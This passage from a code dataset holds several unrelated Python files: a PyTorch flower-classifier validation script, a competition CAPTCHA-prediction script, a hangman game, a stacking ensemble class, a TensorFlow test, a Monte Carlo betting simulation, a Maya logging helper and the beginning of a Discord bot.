args.arch\nimage_path = args.image_path\nhidden_units = args.hidden_units\n\n\n#defining if model should be run on cpu or GPU\nif args.device == 'cpu':\n device = 'cpu'\n print('Device is set to cpu')\nelif args.device == 'GPU':\n if (torch.cuda.is_available()):\n device = 'cuda'\n print('GPU device is available and will be set to GPU')\n\n else:\n device = 'cpu'\n print ('Device could not be set to GPU, therefore device is cpu')\n\n\n\n\n\n\n\n\n\n\n\n\nprint('setting parameters')\n#Setting directories\ndata_dir = 'flowers'\ntrain_dir = args.train_dir\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n\n\nprint('define data transforms')\ndata_transforms = {\n 'train': transforms.Compose([\n transforms.RandomRotation(random_rotation),\n transforms.RandomResizedCrop(random_resize),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(network_means, network_stds) ]),\n\n 'validate' : transforms.Compose([\n transforms.Resize(resize),\n transforms.CenterCrop(center_crop),\n transforms.ToTensor(),\n transforms.Normalize(network_means, network_stds) ]),\n\n 'test' : transforms.Compose([\n transforms.Resize(resize),\n transforms.CenterCrop(center_crop),\n transforms.ToTensor(),\n transforms.Normalize(network_means, network_stds) ])\n}\n\nprint('define what are the datasets')\n# Load the datasets with ImageFolder\ntrain_dir = args.train_dir\n\nimage_datasets = {\n 'train': datasets.ImageFolder(train_dir, transform= data_transforms['train']),\n 'validate': datasets.ImageFolder(valid_dir, transform = data_transforms['validate']),\n 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test'])\n}\n\n\n\n\nprint('define dataloader')\n# Define the dataloaders using the image datasets and the trainforms\ndataloaders = {\n 'train': torch.utils.data.DataLoader(image_datasets['train'], batch_size = 64, shuffle = True),\n 'validate': torch.utils.data.DataLoader(image_datasets['validate'], batch_size = 32),\n 'test': torch.utils.data.DataLoader(image_datasets['test'], batch_size = 32)\n}\n\n\n\n\n\nprint('define model architecture')\n## define model architecture\n#Define model and classifier size dependant on chosen model\narch = args.arch\nmodel = models.__dict__[args.arch](pretrained=True)\nif arch == \"vgg16\":\n layers = [25088, hidden_units, 200, 102]\n\nelif arch == 'densenet161':\n layers = [2208, hidden_units, 200, 102]\n\n# model = models.vgg16(pretrained=True)\n\n# don't compute gradients\nfor param in model.parameters():\n param.requires_grad = False\n\n\n\n\n#defining build_classifier\nprint('define build_classifier')\ndef build_classifier(layers):\n\n\n classifier = nn.Sequential(\n nn.Linear(layers[0], layers[1]),\n nn.ReLU(),\n nn.Dropout(0.5), #50 % probability\n nn.Linear(layers[1], layers[2]),\n torch.nn.ReLU(),\n torch.nn.Dropout(0.2), #20% probability\n nn.Linear(layers[2], layers[3]),\n nn.LogSoftmax(dim=1))\n\n return classifier\n\n\n\n\n\n\n\n\n\n\n\n#defining load_checkpoint\nprint('define load_checkpoint')\ndef load_checkpoint(filepath, arch):\n\n checkpoint = torch.load(filepath, map_location=lambda storage, loc: storage)\n model = models.vgg16(pretrained=True)\n\n # Freeze the feature parameters\n for params in model.parameters():\n params.requires_grad = False\n\n #create new classifier\n classifier = build_classifier(layers)\n model.classifier = classifier\n\n\n criterion = nn.NLLLoss()\n\n optimizer = optim.Adam(model.classifier.parameters(), lr = 0.001)\n\n\n model.class_to_idx = checkpoint['class_to_idx']\n\n model.load_state_dict(checkpoint['model_state_dict'])\n\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return model, criterion\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nprint('define validate_model')\ndef validate_model(model , criterion , dataloader ):\n model.eval()\n model.cuda()\n sum_loss = 0\n sum_accuracy = 0\n\n for data in iter(dataloader):\n inputs, labels = data\n\n inputs = inputs.float().cuda()\n labels = labels.long().cuda()\n\n inputs = Variable(inputs)\n labels = Variable(labels)\n\n output = model.forward(inputs)\n loss = criterion(output, labels)\n sum_loss += loss\n ps = torch.exp(output).data\n\n equality = labels.data == ps.max(1)[1]\n sum_accuracy += equality.type_as(torch.FloatTensor()).mean()\n\n loss_rate = sum_loss / len(dataloader)\n accuracy_rate = sum_accuracy / len(dataloader)\n\n return accuracy_rate, loss_rate\n\n\nmodel, criterion = load_checkpoint(filepath, model)\nmodel.to(device)\nvalidate_accuracy_rate, validate_loss_rate = validate_model(model , criterion , dataloaders['train'])\n\nprint('For the validation set, the accuracy rate is {:.3}'.format(validate_accuracy_rate))\nprint('For the validation set, the loss rate is {:.3}'.format(validate_loss_rate))\n","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86833722","text":"'''\nThis will be main file which the co-ordinaters of the event will be using to test your\ncode. This file contains two functions:\n\n1. predict: You will be given an rgb image which you will use to predict the output \nwhich will be a string. For the prediction you can use/import code,models from other files or\nlibraries. More detailes given above the function defination.\n\n2. test: This will be used by the co-ordinators to test your code by giving sample \ninputs to the 'predict' function mentioned above. A sample test function is given for your\nreference but it is subject to minor changes during the evaluation. However, note that\nthere won't be any changes in the input format given to the predict function.\n\nMake sure all the necessary functions etc. you import are done from the same directory. And in \nthe final submission make sure you provide them also along with this script.\n'''\n\n\nimport tensorflow as tf \n# from tensorflow import keras\n# from keras import layers\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\n# from tesseract_predict import *\nimport os\nimport glob\nimport shutil\nimport sys\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport imutils\nfrom preprocessing import preprocess \n# from preprocessing1 import preprocess\nfrom keras.models import load_model\n\n'''\nfunction: predict\ninput: image - A numpy array which is an rgb image\noutput: answer - A string which is the full captcha\n\nSuggestion: Try to make your code understandable by including comments and organizing it. For \nthis we encourgae you to write essential function in other files and import them here so that \nthe final code is neat and not too big. Make sure you use the same input format and return \nsame output format.\n'''\ndef predict(image):\n model=models.Sequential()\n num_classes=26\n model.add(layers.Conv2D(32,(5,5),padding='valid',activation='relu',input_shape=(64,64,1)))\n model.add(layers.Conv2D(64,(5,5),padding='valid',activation='relu'))\n model.add(layers.MaxPooling2D((2,2)))\n model.add(layers.Conv2D(128,(3,3),activation='relu'))\n model.add(layers.Conv2D(256,(3,3),activation='relu'))\n model.add(layers.MaxPooling2D((2,2)))\n model.add(layers.Dropout(0.25))\n model.add(layers.Flatten())\n model.add(layers.Dense(512,activation='relu'))\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(256,activation='relu'))\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(num_classes,activation='softmax'))\n model.load_weights('model_char5.h5')\n model2 = load_model('46_model.h5')\n class_mapping='0LACdEhHJKMn2PRTUWX3Y5bQ89'\n class_mapping2='0123?56?89A8C?EF?H?JKLM?0PQR5TU?WXY2Qbd???hn9??'\n \n count=0\n total=0\n images,images2=preprocess(image)\n answer=\"\"\n for i in range(len(images2)):\n image1=images[i]\n image2=images2[i]\n result = np.argmax(model.predict(image1))\n result_confidence=np.max(model.predict(image1))\n print(\"model1\",class_mapping[result],result_confidence)\n result2 = np.argmax(model2.predict(image2))\n result_confidence2=np.max(model2.predict(image2))\n print(\"model2\",class_mapping2[result2],result_confidence2)\n if class_mapping2[result2]=='?':\n answer+=(class_mapping[result])\n elif class_mapping[result]=='Q':\n answer+=class_mapping2[result2]\n else:\n if result_confidence2<=result_confidence-0.14:\n answer+=(class_mapping[result])\n else:\n answer+=(class_mapping2[result2])\n return answer \n'''\n Write your code for prediction here.\n '''\n # answer = 'xyzabc' # sample needs to be modified\n\n\n\n'''\nfunction: test\ninput: None\noutput: None\n\nThis is a sample test function which the co-ordinaors will use to test your code. This is\nsubject to change but the imput to predict function and the output expected from the predict\nfunction will not change. \nYou can use this to test your code before submission: Some details are given below:\nimage_paths : A list that will store the paths of all the images that will be tested.\ncorrect_answers: A list that holds the correct answers\nscore : holds the total score. Keep in mind that scoring is subject to change during testing.\n\nYou can play with these variables and test before final submission.\n'''\ndef test():\n '''\n We will be using a similar template to test your code\n '''\n image_paths = ['corthon.jpeg']\n correct_answers = ['AXCKP']\n score = 0\n\n for i,image_path in enumerate(image_paths):\n image = cv2.imread(image_path) # This input format wont change\n answer = predict(image) # a string is expected\n print(answer)\n if correct_answers[i] == answer:\n score += 10\n \n print('The final score of the participant is',score)\n\n\nif __name__ == \"__main__\":\n test()","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93396443","text":"from .exceptions import *\n\nimport random\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = [\n]\n\n\ndef _get_random_word(list_of_words):\n if not list_of_words:\n raise InvalidListOfWordsException\n return random.choice(list_of_words)\n\n\ndef _mask_word(word):\n if not word:\n raise InvalidWordException\n return '*'*(len(word))\n\n\ndef _uncover_word(answer_word, masked_word, character):\n if not answer_word or not masked_word or len(answer_word)!=len(masked_word):\n raise InvalidWordException\n if len(character)>1 or not character or type(character) != str:\n raise InvalidGuessedLetterException\n \n \n \n list_of_indices=[]\n count=0\n answer_word=answer_word.lower()\n character=character.lower()\n for char in answer_word:\n if character==char:\n list_of_indices.append(count)\n count+=1\n \n masked_word=list(masked_word)\n for index in list_of_indices:\n masked_word[index]=character\n \n return \"\".join(masked_word)\n \n\n\ndef guess_letter(game, letter):\n if game['answer_word']==game['masked_word'] or game['remaining_misses']==0: #checks to see if game already complete\n raise GameFinishedException\n \n letter=letter.lower()\n \n if letter in game['previous_guesses']:\n raise InvalidGuessedLetterException\n \n \n previously_masked=game['masked_word']\n game['masked_word']=_uncover_word(game['answer_word'],game['masked_word'],letter)\n game['previous_guesses'].append(letter)\n if previously_masked==game['masked_word']:\n game['remaining_misses'] -= 1\n \n if game['answer_word']==game['masked_word']:\n raise GameWonException\n if game['remaining_misses']==0:\n raise GameLostException\n \n return game\n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571744065","text":"def binarystring(st,current=0):\n if current == len(st):\n print(st)\n return None\n if st[current] == '?':\n cp = st[:]\n cp[current] = '0'\n binarystring(cp, current+1)\n\n cp = st[:]\n cp[current] = '1'\n binarystring(cp, current+1)\n return None\n else:\n binarystring(st,current+1)\n\n\nbinarystring(list(\"1??0?101\"))","sub_path":"Problems/BinaryStringPattern.py","file_name":"BinaryStringPattern.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637540731","text":"import numpy as np\nfrom sklearn.model_selection import KFold\nimport copy\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nclass StackingModel_v3:\n def __init__(self, topLayer_model, base_model_list,\n n_fold=5, use_probas=True, average_probas=False, val_weight_average=False, val_set=[]):\n self.topLayer_model = topLayer_model\n self.base_model_list = base_model_list #存储M个输入的未训练模型\n self.n_flod = n_fold # 默认5折交叉\n self.use_probas=use_probas\n self.average_probas = average_probas\n self.val_weight_average = val_weight_average\n self.val_set = val_set\n self.weight_lst = []\n\n def fit(self, X_train, y_train):\n X_train, y_train = np.array(X_train), np.array(y_train)\n self.class_inter_dict = self.__build_class_inter_dict(y_train)\n print(self.class_inter_dict)\n\n self.had_train_models = [] # 存储训练好的(M * K)个模型\n for i, model in enumerate(self.base_model_list):\n train_pred = []\n KFold_models = []\n loss_lst = []\n for j, (tra_idx, val_idx) in enumerate(KFold(n_splits=self.n_flod).split(X_train)):\n X_tra, X_val = X_train[tra_idx], X_train[val_idx]\n y_tra, y_val = y_train[tra_idx], y_train[val_idx]\n model.fit(X_tra, y_tra)\n if self.val_set==[]:\n print('#直接用\"构建特征的���证集\"计算损失')\n loss_lst.append(self.__cal_loss(model, X_val, y_val)) #直接用构建特征的验证集计算损失\n else:\n print('#使用\"外部验证集\"计算损失')\n loss_lst.append(self.__cal_loss(model, self.val_set[0], self.val_set[1])) #使用外部验证集计算损失\n KFold_models.append(copy.deepcopy(model))\n if self.use_probas:\n train_pred += model.predict_proba(X_val).tolist()\n else:\n train_pred += [[e]for e in model.predict(X_val)]\n self.weight_lst.append(self.__cal_weight_lst(loss_lst))\n self.had_train_models.append(copy.deepcopy(KFold_models)) #存储训练好的K折模型,用于预测\n\n train_pred = np.array(train_pred)\n if i == 0:\n X_train_stack = train_pred\n else:\n if not self.average_probas:\n X_train_stack = np.c_[X_train_stack, train_pred]\n else:\n #将每个模型的预测,求平均\n X_train_stack += train_pred\n if i == len(self.base_model_list) - 1:\n X_train_stack = X_train_stack / len(self.base_model_list)\n\n # 顶层模型的训练\n self.topLayer_model.fit(X_train_stack, y_train)\n\n def predict(self, X_test):\n return self.__predict_tmp(X_test, out_probas=False)\n\n def predict_proba(self, X_test):\n return self.__predict_tmp(X_test, out_probas=True)\n\n def __predict_tmp(self, X_test, out_probas=False): # 测试集的数据是X_test_stack,而不是原来的X_test\n for i, KF_models in enumerate(self.had_train_models):\n test_pred = []\n for model in KF_models:\n if self.use_probas:\n test_pred.append(model.predict_proba(X_test).tolist())\n else:\n test_pred.append([[e] for e in model.predict(X_test)])\n if self.val_weight_average: #每折加权平均\n test_pred = self.__cal_weight_average(self.weight_lst[i], np.array(test_pred))\n else: #每折直接平均\n test_pred = np.mean(np.array(test_pred), axis=0)\n if i == 0:\n X_test_stack = test_pred\n else:\n if not self.average_probas:\n X_test_stack = np.c_[X_test_stack, test_pred]\n else:\n X_test_stack += test_pred\n if i == len(self.base_model_list) - 1:\n X_test_stack = X_test_stack / len(self.base_model_list)\n # 顶层模型预测\n if out_probas:\n return self.topLayer_model.predict_proba(X_test_stack)\n else:\n return self.topLayer_model.predict(X_test_stack)\n\n def __cal_weight_average(self, kw_lst, test_pred):\n test_weight_average = []\n for kw, test_single in zip(kw_lst, test_pred):\n test_weight_average.append(kw * test_single)\n return np.sum(test_weight_average, axis=0)\n\n def __cal_weight_lst(self, loss_lst):\n print('每一折的损失:', loss_lst)\n Sk_sum = 0\n for sj in loss_lst:\n Sk_sum += (1 / sj)\n weight_lst = []\n for sk in loss_lst:\n weight_lst.append((1 / sk) / Sk_sum)\n\n print('每一折对应的模型权重:', weight_lst)\n print('所有权值加起来=', sum(weight_lst))\n return weight_lst\n\n def __cal_loss(self, model, X_val, y_val):\n n_class = len(set(y_val))\n y_pred_proba = model.predict_proba(X_val)\n y_val_oneHot = self.__oneHot(y_val)\n\n #计算损失\n sk = 0\n for i_sample in range(len(y_val)):\n for i_class in range(n_class):\n sk += abs(y_pred_proba[i_sample,i_class] - y_val_oneHot[i_sample,i_class])\n return sk / n_class\n\n def __oneHot(self, y_val):\n inter_encode = np.array([self.class_inter_dict[e] for e in y_val])\n onehot_encoder = OneHotEncoder(sparse=False)\n y_val_ontHot = onehot_encoder.fit_transform(inter_encode.reshape(-1, 1))\n return np.array(y_val_ontHot)\n\n def __build_class_inter_dict(self, y_train):\n y_train_set = set(y_train)\n class_inter_dict = {}\n for i, e in enumerate(y_train_set):\n class_inter_dict[e] = i\n return class_inter_dict\n\n","sub_path":"machine_learning_model/stacking/ensemble_learning_v3.py","file_name":"ensemble_learning_v3.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553372965","text":"\"\"\"\nTests for leabratf.utils.py\n\"\"\"\nimport logging\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom leabratf import tfutils\n\ndef test_repeat():\n \"\"\"\n Test taken from github issue page:\n https://github.com/tensorflow/tensorflow/issues/8246\n \"\"\"\n def np_repeat(tensor, repeats):\n assert len(repeats) == tensor.ndim, \"dimension must match\"\n repeated = tensor\n for axis, repeat in enumerate(repeats):\n repeated = np.repeat(repeated, repeat, axis = axis)\n return repeated\n shape = [1,3,3,3,2]\n repeat = [1,2,2,3,1]\n tensor = np.random.randn(*shape)\n np_repeated_tensor = np_repeat(tensor, repeat)\n tf_tensor = tf.constant(tensor)\n g = tf.get_default_graph()\n tf_new = tfutils.repeat(tf_tensor, repeat)\n with tf.Session(graph=g) as sess:\n tf_repeated_tensor = tf_new.eval()\n assert np.allclose(np_repeated_tensor, tf_repeated_tensor)\n","sub_path":"leabratf/tests/test_tfutils.py","file_name":"test_tfutils.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23451066","text":"#monte carlo simulation used to test the \n#monte carol is used for\n#the first task is\nimport random \nimport matplotlib.pyplot as plt\n\nlower_bust = 31.24\n#we want to have bust rate less than 31.24\nhigher_profit = 63.208\n#we want to have profit percent higher than or equal to 63.4\n\n\n\ndef rollDice():\n\t#notes we commmented the print functions since we used them initialy to debug the function\n\t#after we have emphasised that the function works well we can simply comment them\n\troll = random.randint(1,100)\n\n\tif roll <=50:\n\t\t#print(f\"{roll} roll is 100 you loss what are the odds! play again\")\n\t\treturn False\t\n\n\telif roll>50:\n\t\t#print(f\"{roll} roll was 51-100 you win pretty light flash\")\n\t\treturn True\n\t#now come an create simple bettor\n\n\ndef simple_bettor(funds,initial_wager,wager_count):\n\tvalue = funds\n\twager = initial_wager\n\t#now we ate going to plot wagers and values\n\tglobal broke_count\n\tglobal simple_profits\n\tglobal simple_bust\n\twx = []\n\tvy = []\n\n\n\t#the two above lists are used to store some data\n\n\tcurrentWager = 0\n\tstatus = None\n\twhile currentWager < wager_count :\n\t\t\n\t\twx.append(currentWager)\n\t\tvy.append(value)\n\n\t\tif rollDice():\n\t\t\tvalue += wager\n\t\t\tstatus = wager\n\t\t\t#if we roll the dice and we won then we add the wager to our fund\n\t\telse :\n\t\t\tvalue -= wager\n\t\t\tstatus = -wager\n\n\t\tcurrentWager +=1\n\t\t#we add wager so we increment the number of wagers we encountered\n\t\t#print(f\"funds: {value} and you get {status}\")\n\tif value< 0:\n\t\t#so we solve the debt issue\n\t\tsimple_bust += 1\n\t\tvalue = 'broke'\n\n\tplt.plot(wx,vy,'k')\n\tif value>startingFunds:\n\t\tsimple_profits += 1\n\t#black color\n\n\tprint(f\"funds: {value} and you get {status}\")\n\n\n\n#build double wager which has some strategy if he losses he is going to double the wager\n# if he wins he is going to go back with the same old wager\n\n\ndef doubler_bettor(funds,initial_wager,wager_count):\n#video 6\n\n\tvalue = funds\n\twager = initial_wager\n\t#now we ate going to plot wagers and values\n\n\twx = []\n\tvy = []\n\n\t#the two above lists are used to store some data\n\n\tcurrentWager = 1\n\tstatus = None\n\tglobal broke_count\n\tglobal doubler_busts\n\tglobal doubler_profits\n\n\tprevious_wager = 'win'\n\tprevious_wager_amount = initial_wager\n\n\twhile currentWager <= wager_count:\n\t\tif previous_wager=='win':\n\t\t\tprint(\"we win hte last wager. great\")\n\t\t\tif rollDice():\n\t\t\t\tvalue += wager\n\t\t\t\tprint (value)\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\t\t\telse :\n\t\t\t\tvalue -= wager\n\t\t\t\tprevious_wager = 'loss'\n\t\t\t\tprint(value)\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\t\tif value < 0:\n\t\t\t\t\tprint(f\"we went broke again after {currentWager} rolls\")\n\t\t\t\t\tdoubler_busts += 1\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\n\t\telif previous_wager=='loss':\n\t\t\tprint('we los the last one so we will be smart and double the wager')\n\t\t\t#v.9\n\t\t\t#we want to solve the debt issue until v.8 \n\t\t\t#so in the cass previous_wager was loss then we\n\t\t\t#make sure that the value we have left is larger than the wager\n\t\t\tif rollDice():\n\t\t\t\twager = previous_wager_amount*2\n\t\t\t\tprint(f\"we won with {wager}\")\n\t\t\t\tif value - wager < 0 :\n\t\t\t\t\twager = value\n\t\t\t\t\t#note we donot want to endup with debt so we make the last wager equals the value\n\t\t\t\tvalue += wager\n\t\t\t\tprint(value)\n\t\t\t\twager = initial_wager\n\t\t\t\tprevious_wager = 'win'\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\telse:\n\t\t\t\twager = previous_wager_amount*2\n\t\t\t\tprint (f\"we lost {wager}\")\n\t\t\t\tif value - wager <0:\n\t\t\t\t\twager = value\n\t\t\t\tvalue -= wager\n\t\t\t\tif value<=0:\n\t\t\t\t\tprint(f\"we went broke after {currentWager} rolls\")\n\t\t\t\t\tdoubler_busts += 1\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\t\tprint(value)\n\t\t\t\tprevious_wager = 'loss'\n\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\tcurrentWager +=1\n\tprint (value)\n\tplt.plot(wx,vy,'c')\n\tif value> startingFunds:\n\t\tdoubler_profits +=1\n\t#cin color is faint blue\n\n\n\ndef multiple_bettor(funds, initial_wager,wager_count):\n\t#the goal of the alogrithm is to define the best percents to wagers with\n\tglobal multiple_busts\n\tglobal multiple_profit\n\n\tvalue = funds\n\twager = initial_wager\n\twx = []\n\tvy = []\n\tcurrentWager = 1\n\tprevious_wager = 'win'\n\n\tprevious_wager_amount = initial_wager\n\n\twhile currentWager <= wager_count:\n\t\tif previous_wager=='win':\n\t\t\t#print(\"we win hte last wager. great\")\n\t\t\tif rollDice():\n\t\t\t\tvalue += wager\n\t\t\t#\tprint (value)\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\t\t\telse :\n\t\t\t\tvalue -= wager\n\t\t\t\tprevious_wager = 'loss'\n\t\t\t#\tprint(value)\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\t\tif value < 0:\n\t\t\t#\t\tprint(f\"we went broke again after {currentWager} rolls\")\n\t\t\t\t\tmultiple_busts += 1\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\n\t\telif previous_wager=='loss':\n\t\t\t#print('we los the last one so we will be smart and double the wager')\n\t\t\t#v.9\n\t\t\t#we want to solve the debt issue until v.8 \n\t\t\t#so in the cass previous_wager was loss then we\n\t\t\t#make sure that the value we have left is larger than the wager\n\t\t\tif rollDice():\n\t\t\t\twager = previous_wager_amount*random_multiple\n\n\t\t\t#\tprint(f\"we won with {wager}\")\n\t\t\t\tif value - wager < 0 :\n\t\t\t\t\twager = value\n\t\t\t\t\t#note we donot want to endup with debt so we make the last wager equals the value\n\t\t\t\tvalue += wager\n\t\t\t#\tprint(value)\n\t\t\t\twager = initial_wager\n\t\t\t\tprevious_wager = 'win'\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\t\telse:\n\t\t\t\twager = previous_wager_amount*random_multiple\n\t\t\t#\tprint (f\"we lost {wager}\")\n\t\t\t\tif value - wager <0:\n\t\t\t\t\twager = value\n\t\t\t\tvalue -= wager\n\t\t\t\tif value<=0:\n\t\t\t#\t\tprint(f\"we went broke after {currentWager} rolls\")\n\t\t\t\t\tmultiple_busts += 1\n\t\t\t\t\t\n\t\t\t\t\tbreak\n\t\t\t#\tprint(value)\n\t\t\t\tprevious_wager = 'loss'\n\n\t\t\t\tprevious_wager_amount = wager\n\t\t\t\twx.append(currentWager)\n\t\t\t\tvy.append(value)\n\n\t\tcurrentWager +=1\n\t\n\t#print (value)\n\t#plt.plot(wx,vy,'c')\n\tif value> funds:\n\t\tmultiple_profit +=1\n\t#cin color is faint blue\n\n\n\n\n\n#commented at the start of vi.15\n# this is part of vi.14 dalmbert\n\n\n\ndef dAlemert (funds,initial_wager,wager_count):\n\t\tglobal da_busts\n\t\tglobal da_profits\n\n\t\tglobal Ret\n\t\tvalue = funds\n\t\twager = initial_wager\n\t\tcurrentWager = 1\n\t\tprevious_wager = 'win'\n\t\tprevious_wager_amount = initial_wager\n\t\t#hte amount of money we are wagering\n\t\twhile currentWager <= wager_count:\n\t\t\tif previous_wager == 'win':\n\t\t\t\tif wager == initial_wager:\n\t\t\t\t\tpass\n\t\t\t\telse :\n\t\t\t\t\twager -= initial_wager\n\t\t\t\t\n\t\t\t\t#print(f\"current wager {wager} value {value}\")\n\t\t\t\t\n\t\t\t\tif rollDice():\n\t\t\t\t\tvalue += wager\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\t\t#print(f\"we won current value: {value}\")\n\t\t\t\telse :\n\t\t\t\t\tvalue -= wager\n\t\t\t\t\tprevious_wager = 'loss'\n\t\t\t\t\t#print(f\"we lost current value {value}\")\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\t\tif value <= 0:\n\t\t\t\t\t\tda_busts += 1\n\t\t\t\t\t\tbreak\n\t\t\telif previous_wager == 'loss':\n\t\t\t\twager = previous_wager_amount+initial_wager\n\t\t\t\tif (value - wager ) <= 0:\n\t\t\t\t\twager = 0\n\t\t\t\t#print(f\"we lost the last wager {wager} \")\n\t\t\t\t\t#we donont want ot enter the debt\n\t\t\t\tif rollDice():\n\t\t\t\t\tvalue += wager\n\t\t\t\t\tprevious_wager = 'win'\n\t\t\t\t\tprevious_wager_amount = wager\n\t\t\t\telse :\n\t\t\t\t\tvalue -= wager\n\t\t\t\t\tprevious_wager_amount = wager\n\n\t\t\t\t\tif value <= 0:\n\t\t\t\t\t\tda_busts +=1\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t# we get in debt we donot want to play any more\n\t\t\n\t\t\tcurrentWager +=1\n\t\tif value > funds:\n\t\t\tda_profits += 1\n\t\tRet += value\n\n\n\n\n\n\n\nsamplesize = 100\nstartingFunds = 100000\n\nwhile True:\n\t\t\n\twagersize = random.uniform(1.0,1000.00)\n\t#the amount we are wagering\n\twagercount = random.uniform(10,100000)\n\t#the target number of wagers\n\n\twagercount = 100\n\n\n\tda_profits = 0\n\tda_busts = 0\n\tRet = 0\n\t#of the people who profit how much they make profit\n\t#out of the people who loss how much did they loss\n\t#out of the people who\n\n\tx = 0\n\twhile x< samplesize:\n\n\t\tdAlemert (startingFunds,wagersize,wagercount)\n\t\tx += 1\n\n\tROI = Ret - samplesize*startingFunds\n\tprint(f\"total invested is {samplesize*startingFunds}\")\n\tprint(f\"total return {Ret}\")\n\tprint(f\"the total return of investment is{ROI}\")\n\tprint(f\"bust rate is {da_busts/samplesize*100.00}\")\n\tprint(f\"profit rate is {da_profits/samplesize*100.00}\")\n\n\tprint(\"############################################\")\n\tprint(f\"number of people make money is {da_profits}\")\n\tprint(\"############################################\")\n\n\n","sub_path":"Monte-Carlo-Comparing-profit.py","file_name":"Monte-Carlo-Comparing-profit.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410058926","text":"import pymel.core as pm\nfrom pymel.internal.plogging import pymelLogger\n\n#===============================================================================\n# GLOBAL FUNCTIONS\n#===============================================================================\n#PRINT\ndef PRINT(msg='', item='', type='info'):\n printMsg = '|| %s || %s' %(msg.ljust(65), item.ljust(20))\n \n if type == 'debug':\n pymelLogger.debug('\\t\\t\\t%s'%printMsg)\n elif type == 'info':\n pymelLogger.info('\\t\\t\\t%s'%printMsg)\n elif type == 'warning':\n pymelLogger.warning('\\t%s'%printMsg)\n elif type == 'error':\n pymelLogger.error('\\t%s'%printMsg)\n elif type == 'critical':\n pymelLogger.critical('\\t%s'%printMsg)\n else:\n pymelLogger.error('Cannot Print Message: Invalid Type')\n \n return","sub_path":"lib/utils/_archives/20141023/_utils_global.py","file_name":"_utils_global.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617525486","text":"# bot.py\nimport os\nimport discord\nfrom discord.ext import commands\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\nimport dotenv\n\ndotenv.load_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nPREFIX = os.getenv('BOT_PREFIX')\n\nclient = discord.Client()\n\n#sets the prefix for the bot\nclient = commands.Bot(command_prefix=PREFIX)\n\n#Initializer function\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\"\"\"\nloads an extension, chose from the following in the cogs folder\nParameters:\n -extension: String which contains the name of the file excluding the extension type\n example: main\n\"\"\"\n@client.command(hidden = True)\nasync def load(ctx, extension):\n await ctx.send(f'Loading {extension}...')\n client.load_extension(f'cogs.{extension}')\n\n\"\"\"\nunloads an extension, chose from the following in the cogs folder\nParameters:\n -extension: String which contains the name of the file excluding the extension type\n example: main\n\"\"\"\n@client.command(hidden = True)\nasync def unload(ctx, extension):\n await ctx.send(f'Unloading {extension}...')\n client.unload_extension(f'cogs.{extension}')\n\n\"\"\"\nreloads an extension, chose from the following in the cogs folder\nParameters:\n -extension: String which contains the name of the file excluding the extension type\n example: main\n\"\"\"\n@client.command(hidden = True)\nasync def reload(ctx, extension):\n await ctx.send(f'Reloading {extension}...')\n client.unload_extension(f'cogs.{extension}')\n client.load_extension(f'cogs.{extension}')\n\n#Generic error handling for missing arguments\n@client.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n 